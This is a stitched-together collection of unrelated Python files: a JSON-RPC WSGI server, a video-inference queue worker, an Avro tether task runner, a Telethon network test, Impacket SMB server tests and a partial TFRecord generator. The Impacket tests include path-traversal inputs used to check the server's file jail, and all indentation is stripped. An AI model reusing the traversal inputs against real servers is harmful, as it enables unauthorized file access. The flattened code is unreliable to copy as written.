params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Variation_Viewer'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Variation_Viewer.run_Variation_Viewer,
name='Variation_Viewer.run_Variation_Viewer',
types=[dict])
self.method_authentication['Variation_Viewer.run_Variation_Viewer'] = 'required' # noqa
self.rpc_service.add(impl_Variation_Viewer.status,
name='Variation_Viewer.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Variation_Viewer ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception as e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print('Request method was %s\n' % environ['REQUEST_METHOD'])
# print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
# print('Request body was: %s' % request_body)
# print('Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result))
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body.encode('utf8')]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print("Monkeypatching std libraries for async")
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
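# Illustrative usage sketch: run the service on an OS-assigned port in a child
# process, exercise it over HTTP, then shut it down.
# >>> port = start_server(port=0, newprocess=True)
# >>> # ... POST JSON-RPC requests to http://localhost:<port>/ ...
# >>> stop_server()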
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
test.py
|
import boto3
import os
import sys
import cv2
import numpy
import requests
import json
import logging
import threading
import queue
import coco_label_map
ENDPOINT = 'http://localhost:8501/v1/models/default:predict'
TMP_FILE = "./tmp.mov"
FRAME_BATCH=5
FRAME_MAX=20
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s',
handlers=[ logging.StreamHandler(sys.stdout) ],
)
log = logging.getLogger()
def get_predictions_from_image_array(batch):
res = requests.post(ENDPOINT, json={ 'instances': batch })
return res.json()['predictions']
def get_classes_with_scores(predictions):
vals = []
for p in predictions:
num_detections = int(p['num_detections'])
detected_classes = p['detection_classes'][:num_detections]
detected_classes =[coco_label_map.label_map[int(x)] for x in detected_classes]
detection_scores = p['detection_scores'][:num_detections]
vals.append(list(zip(detected_classes, detection_scores)))
return vals
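# Illustrative sketch of the response shape this helper expects (assumed from
# the keys used above, not taken from the model server itself); label names
# depend on coco_label_map:
# >>> preds = [{'num_detections': 2.0,
# ...           'detection_classes': [1.0, 18.0],
# ...           'detection_scores': [0.97, 0.64]}]
# >>> get_classes_with_scores(preds)
# [[('<label 1>', 0.97), ('<label 18>', 0.64)]]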
def prepare(prepare_queue, inference_queue):
while True:
inference_queue.put(prepare_queue.get().tolist())
def add_to_prepare(prepare_queue, frames):
for f in frames:
prepare_queue.put(f)
frames.clear()
def process_video_from_file(file_path, prepare_queue, inference_queue):
log.info('process_video_from_file')
frames = []
vidcap = cv2.VideoCapture(file_path)
success, frame = vidcap.read()
success = True
log.info('start frame extraction')
max_frame = 0
while success:
frames.append(frame)
success, frame = vidcap.read()
max_frame += 1
if max_frame == FRAME_MAX:
break
log.info('end frame extraction')
count = len(frames)
add_worker = threading.Thread(target=add_to_prepare, args=(prepare_queue, frames,))
add_worker.start()
log.info('frame count: %d', count)
batch = []
predictions = []
log.info('frame batch %d', FRAME_BATCH)
for i in range(count):
batch.append(inference_queue.get())
if len(batch) == FRAME_BATCH or i == (count - 1):
log.info('range: %d - batch: %d', i, len(batch))
for v in get_classes_with_scores(get_predictions_from_image_array(batch)):
predictions.append(str(v))
predictions.append('\n')
batch.clear()
vidcap.release()
#cv2.destroyAllWindows()
return predictions
def main():
task_queue_name = None
task_completed_queue_name = None
try:
task_queue_name = os.environ['SQS_TASK_QUEUE']
task_completed_queue_name = os.environ['SQS_TASK_COMPLETED_QUEUE']
except KeyError:
log.error('Please set the environment variables for SQS_TASK_QUEUE and SQS_TASK_COMPLETED_QUEUE')
sys.exit(1)
# Get the instance information
r = requests.get("http://169.254.169.254/latest/dynamic/instance-identity/document")
r.raise_for_status()
response_json = r.json()
region = response_json.get('region')
instance_id = response_json.get('instanceId')
ec2 = boto3.client('ec2', region_name=region)
s3 = boto3.client('s3', region_name=region)
task_queue = boto3.resource('sqs', region_name=region).get_queue_by_name(QueueName=task_queue_name)
task_completed_queue = boto3.resource('sqs', region_name=region).get_queue_by_name(QueueName=task_completed_queue_name)
log.info('Initialized - instance: %s', instance_id)
prepare_queue = queue.Queue()
inference_queue = queue.Queue(maxsize=FRAME_BATCH)
prepare_worker = threading.Thread(target=prepare, args=(prepare_queue, inference_queue,))
prepare_worker.start()
while True:
for message in task_queue.receive_messages(WaitTimeSeconds=10):
try:
log.info('Message received - instance: %s', instance_id)
ec2.modify_instance_attribute(
InstanceId=instance_id,
DisableApiTermination={ 'Value': True },
)
log.info('Termination protection engaged - instance: %s', instance_id)
message.change_visibility(VisibilityTimeout=600)
log.info('Message visibility updated - instance: %s', instance_id)
# Process the message
doc = json.loads(message.body)
log.info('Message body is loaded - instance: %s', instance_id)
s3.download_file(doc['bucket'], doc['object'], TMP_FILE)
log.info('File is downloaded - instance: %s', instance_id)
log.info('Starting predictions - instance: %s', instance_id)
predictions_for_frames = process_video_from_file(TMP_FILE, prepare_queue, inference_queue)
log.info('Predictions completed - instance: %s', instance_id)
log.info(''.join(e for e in predictions_for_frames))
task_completed_queue.send_message(MessageBody=''.join(e for e in predictions_for_frames))
log.info('Task completed msg sent - instance: %s', instance_id)
message.delete()
log.info('Message deleted - instance: %s', instance_id)
ec2.modify_instance_attribute(
InstanceId=instance_id,
DisableApiTermination={ 'Value': False },
)
log.info('Termination protection disengaged - instance: %s', instance_id)
if os.path.exists(TMP_FILE):
os.remove(TMP_FILE)
            except Exception:
log.error('Problem processing message: %s - instance: %s', sys.exc_info()[0], instance_id)
if __name__ == '__main__':
main()
|
tether_task_runner.py
|
#!/usr/bin/env python
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
import logging
import sys
import threading
import traceback
import weakref
import avro.tether.tether_task
import avro.tether.util
from avro import ipc
try:
import BaseHTTPServer as http_server # type: ignore
except ImportError:
import http.server as http_server # type: ignore
__all__ = ["TaskRunner"]
class TaskRunnerResponder(ipc.Responder):
"""
The responder for the tethered process
"""
def __init__(self,runner):
"""
Param
----------------------------------------------------------
runner - Instance of TaskRunner
"""
ipc.Responder.__init__(self, avro.tether.tether_task.inputProtocol)
self.log=logging.getLogger("TaskRunnerResponder")
# should we use weak references to avoid circular references?
        # We use weak references because self.runner owns this instance of TaskRunnerResponder
if isinstance(runner,weakref.ProxyType):
self.runner=runner
else:
self.runner=weakref.proxy(runner)
self.task=weakref.proxy(runner.task)
def invoke(self, message, request):
try:
if message.name=='configure':
self.log.info("TetherTaskRunner: Recieved configure")
self.task.configure(request["taskType"],request["inSchema"],request["outSchema"])
elif message.name=='partitions':
self.log.info("TetherTaskRunner: Recieved partitions")
try:
self.task.set_partitions(request["partitions"])
except Exception as e:
self.log.error("Exception occured while processing the partitions message: Message:\n"+traceback.format_exc())
raise
elif message.name=='input':
self.log.info("TetherTaskRunner: Recieved input")
self.task.input(request["data"],request["count"])
elif message.name=='abort':
self.log.info("TetherTaskRunner: Recieved abort")
self.runner.close()
elif message.name=='complete':
self.log.info("TetherTaskRunner: Recieved complete")
self.task.complete()
self.task.close()
self.runner.close()
else:
self.log.warning("TetherTaskRunner: recieved unknown message {0}".format(message.name))
except Exception as e:
self.log.error("Error occured while processing message: {0}".format(message.name))
emsg=traceback.format_exc()
self.task.fail(emsg)
return None
def HTTPHandlerGen(runner):
"""
This is a class factory for the HTTPHandler. We need
a factory because we need a reference to the runner
Parameters
-----------------------------------------------------------------
runner - instance of the task runner
"""
if not(isinstance(runner,weakref.ProxyType)):
runnerref=weakref.proxy(runner)
else:
runnerref=runner
class TaskRunnerHTTPHandler(http_server.BaseHTTPRequestHandler):
"""Create a handler for the parent.
"""
runner=runnerref
def __init__(self,*args,**param):
"""
"""
http_server.BaseHTTPRequestHandler.__init__(self,*args,**param)
def do_POST(self):
self.responder =TaskRunnerResponder(self.runner)
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
return TaskRunnerHTTPHandler
class TaskRunner(object):
"""This class ties together the server handling the requests from
the parent process and the instance of TetherTask which actually
implements the logic for the mapper and reducer phases
"""
def __init__(self,task):
"""
Construct the runner
Parameters
---------------------------------------------------------------
task - An instance of tether task
"""
self.log=logging.getLogger("TaskRunner:")
if not(isinstance(task, avro.tether.tether_task.TetherTask)):
raise ValueError("task must be an instance of tether task")
self.task=task
self.server=None
self.sthread=None
def start(self,outputport=None,join=True):
"""
Start the server
Parameters
-------------------------------------------------------------------
outputport - (optional) The port on which the parent process is listening
for requests from the task.
- This will typically be supplied by an environment variable
we allow it to be supplied as an argument mainly for debugging
        join - (optional) If set to false then we don't issue a join to block
            until the thread executing the server terminates.
This is mainly for debugging. By setting it to false,
we can resume execution in this thread so that we can do additional
testing
"""
port = avro.tether.util.find_port()
address=("localhost",port)
def thread_run(task_runner=None):
task_runner.server = http_server.HTTPServer(address, HTTPHandlerGen(task_runner))
task_runner.server.allow_reuse_address = True
task_runner.server.serve_forever()
# create a separate thread for the http server
sthread=threading.Thread(target=thread_run,kwargs={"task_runner":self})
sthread.start()
self.sthread=sthread
        # This needs to run in a separate thread because serve_forever() blocks
self.task.open(port,clientPort=outputport)
# wait for the other thread to finish
if (join):
self.task.ready_for_shutdown.wait()
self.server.shutdown()
# should we do some kind of check to make sure it exits
self.log.info("Shutdown the logger")
# shutdown the logging
logging.shutdown()
def close(self):
"""
Handler for the close message
"""
self.task.close()
if __name__ == '__main__':
# TODO::Make the logging level a parameter we can set
# logging.basicConfig(level=logging.INFO,filename='/tmp/log',filemode='w')
logging.basicConfig(level=logging.INFO)
if (len(sys.argv)<=1):
print("Error: tether_task_runner.__main__: Usage: tether_task_runner task_package.task_module.TaskClass")
raise ValueError("Usage: tether_task_runner task_package.task_module.TaskClass")
fullcls=sys.argv[1]
mod,cname=fullcls.rsplit(".",1)
logging.info("tether_task_runner.__main__: Task: {0}".format(fullcls))
modobj=__import__(mod,fromlist=cname)
taskcls=getattr(modobj,cname)
task=taskcls()
runner=TaskRunner(task=task)
runner.start()
|
test_network.py
|
import random
import socket
import threading
import unittest
import telethon.network.authenticator as authenticator
from telethon.extensions import TcpClient
from telethon.network import Connection
def run_server_echo_thread(port):
def server_thread():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(('', port))
s.listen(1)
connection, address = s.accept()
with connection:
data = connection.recv(16)
connection.send(data)
server = threading.Thread(target=server_thread)
server.start()
class NetworkTests(unittest.TestCase):
@unittest.skip("test_tcp_client needs fix")
async def test_tcp_client(self):
port = random.randint(50000, 60000) # Arbitrary non-privileged port
run_server_echo_thread(port)
msg = b'Unit testing...'
client = TcpClient()
await client.connect('localhost', port)
await client.write(msg)
self.assertEqual(msg, await client.read(15),
msg='Read message does not equal sent message')
client.close()
@unittest.skip("Some parameters changed, so IP doesn't go there anymore.")
async def test_authenticator(self):
transport = Connection('149.154.167.91', 443)
self.assertTrue(await authenticator.do_authentication(transport))
transport.close()
|
test_smbserver.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2021 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Basic unit tests for the SMB Server.
#
# Author:
# Martin Gallo (@martingalloar)
#
import unittest
from time import sleep
from os.path import exists, join
from os import mkdir, rmdir, remove
from multiprocessing import Process
from six import StringIO, BytesIO, b
from impacket.smbserver import isInFileJail, SimpleSMBServer
from impacket.smbconnection import SMBConnection, SessionError, compute_lmhash, compute_nthash
class SMBServerUnitTests(unittest.TestCase):
"""Unit tests for the SMBServer
"""
def test_isInFileJail(self):
"""Test validation of common prefix path.
"""
jail_path = "/tmp/jail_path"
self.assertTrue(isInFileJail(jail_path, "filename"))
self.assertTrue(isInFileJail(jail_path, "./filename"))
self.assertTrue(isInFileJail(jail_path, "../jail_path/filename"))
self.assertFalse(isInFileJail(jail_path, "/filename"))
self.assertFalse(isInFileJail(jail_path, "/tmp/filename"))
self.assertFalse(isInFileJail(jail_path, "../filename"))
self.assertFalse(isInFileJail(jail_path, "../../filename"))
class SimpleSMBServerFuncTests(unittest.TestCase):
"""Pseudo functional tests for the SimpleSMBServer.
These are pseudo-functional because we use our own SMBConnection classes as the client. For a fully
external functional test we could use, for example, Samba's smbclient or a similar tool.
"""
address = "127.0.0.1"
port = 1445
username = "UserName"
password = "Password"
domain = "DOMAIN"
lmhash = compute_lmhash(password)
nthash = compute_nthash(password)
share_name = "share"
share_path = "jail_dir"
share_file = "jail_file"
share_new_file = "jail_new_file"
share_unjailed_file = "unjailed_new_file"
share_new_content = "some content"
def setUp(self):
"""Creates folders and files required for testing the list, put and get functionality.
"""
if not exists(self.share_path):
mkdir(self.share_path)
for f in [self.share_file, self.share_new_file]:
if not exists(join(self.share_path, f)):
with open(join(self.share_path, f), "a") as fd:
fd.write(self.share_new_content)
def tearDown(self):
"""Removes folders and files used for testing.
"""
for f in [self.share_file, self.share_new_file]:
if exists(join(self.share_path, f)):
remove(join(self.share_path, f))
if exists(self.share_unjailed_file):
remove(self.share_unjailed_file)
if exists(self.share_path):
rmdir(self.share_path)
self.stop_smbserver()
def get_smbserver(self):
return SimpleSMBServer(listenAddress=self.address, listenPort=int(self.port))
def start_smbserver(self, server):
"""Starts the SimpleSMBServer process.
"""
self.server_process = Process(target=server.start)
self.server_process.start()
def stop_smbserver(self):
"""Stops the SimpleSMBServer process and wait for insider threads to join.
"""
self.server_process.terminate()
sleep(0.5)
def test_smbserver_login(self):
"""Test authentication using password and LM/NTHash login.
"""
server = self.get_smbserver()
server.addCredential(self.username, 0, self.lmhash, self.nthash)
self.start_smbserver(server)
# Valid password login
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, self.password)
client.close()
# Valid hash login
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, '', lmhash=self.lmhash, nthash=self.nthash)
client.close()
# Invalid password login
with self.assertRaises(SessionError):
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, 'SomeInvalidPassword')
client.close()
# Invalid username login
with self.assertRaises(SessionError):
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login("InvalidUser", "", lmhash=self.lmhash, nthash=self.nthash)
client.close()
# Invalid hash login
with self.assertRaises(SessionError):
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, "", lmhash=self.nthash, nthash=self.lmhash)
client.close()
def test_smbserver_share_list(self):
"""Test listing files in a shared folder.
"""
server = SimpleSMBServer(listenAddress=self.address, listenPort=int(self.port))
server.addCredential(self.username, 0, self.lmhash, self.nthash)
server.addShare(self.share_name, self.share_path)
self.start_smbserver(server)
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, self.password)
client.listPath(self.share_name, "/")
# Check path traversal in list as in #1066
with self.assertRaises(SessionError):
client.listPath(self.share_name, "../impacket/")
client.close()
def test_smbserver_share_put(self):
"""Test writing files to a shared folder.
"""
server = SimpleSMBServer(listenAddress=self.address, listenPort=int(self.port))
server.addCredential(self.username, 0, self.lmhash, self.nthash)
server.addShare(self.share_name, self.share_path)
self.start_smbserver(server)
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, self.password)
local_file = StringIO(self.share_new_content)
client.putFile(self.share_name, self.share_new_file, local_file.read)
self.assertTrue(exists(join(self.share_path, self.share_new_file)))
with open(join(self.share_path, self.share_new_file), "r") as fd:
self.assertEqual(fd.read(), self.share_new_content)
# Check path traversal in put as in #1066
with self.assertRaises(SessionError):
client.putFile(self.share_name, join("..", self.share_unjailed_file), local_file.read)
self.assertFalse(exists(self.share_unjailed_file))
client.close()
def test_smbserver_share_get(self):
"""Test reading files from a shared folder.
"""
server = SimpleSMBServer(listenAddress=self.address, listenPort=int(self.port))
server.addCredential(self.username, 0, self.lmhash, self.nthash)
server.addShare(self.share_name, self.share_path)
self.start_smbserver(server)
client = SMBConnection(self.address, self.address, sess_port=int(self.port))
client.login(self.username, self.password)
local_file = BytesIO()
client.getFile(self.share_name, self.share_file, local_file.write)
local_file.seek(0)
self.assertEqual(local_file.read(), b(self.share_new_content))
# Check nonexistent file
with self.assertRaises(SessionError):
client.getFile(self.share_name, "unexistent", local_file.write)
client.close()
if __name__ == "__main__":
loader = unittest.TestLoader()
suite = unittest.TestSuite()
suite.addTests(loader.loadTestsFromTestCase(SMBServerUnitTests))
suite.addTests(loader.loadTestsFromTestCase(SimpleSMBServerFuncTests))
unittest.main(defaultTest='suite')
|
generate_tfrecords.py
|
from __future__ import print_function
import os
import numpy as np
import h5py
import cv2
import tensorflow as tf
import sys
import threading
import time
import glob
import argparse
parser = argparse.ArgumentParser(description="Creates .tfrecord")
parser.add_argument('--path', type=str, help="The path in which to look for .hdf5 files. Use @ in place of * in the path.", required=True)
parser.add_argument('--out', type=str, help="The path where to write the tfrecords.", required=True)
args = parser.parse_args()
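# Example invocation (paths are illustrative only):
#   python generate_tfrecords.py --path "/data/renders_@/output" --out /data/tfrecords
# The '@' is replaced by '*' before globbing for *.hdf5 files further below.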
os.environ['CUDA_VISIBLE_DEVICES'] = ''
folder_path = args.path
write_folder_path = args.out
image_size = (512, 512)
def resize_image(img):
return cv2.resize(img, image_size)
def serialize_tfrecord(color, normal):
feature = {}
feature['colors'] = tf.train.Feature(float_list=tf.train.FloatList(value=color.reshape(-1)))
feature['normals'] = tf.train.Feature(float_list=tf.train.FloatList(value=normal.reshape(-1)))
example = tf.train.Example(features=tf.train.Features(feature=feature))
serialized = example.SerializeToString()
return serialized
def deserialize_tfrecord(example_proto):
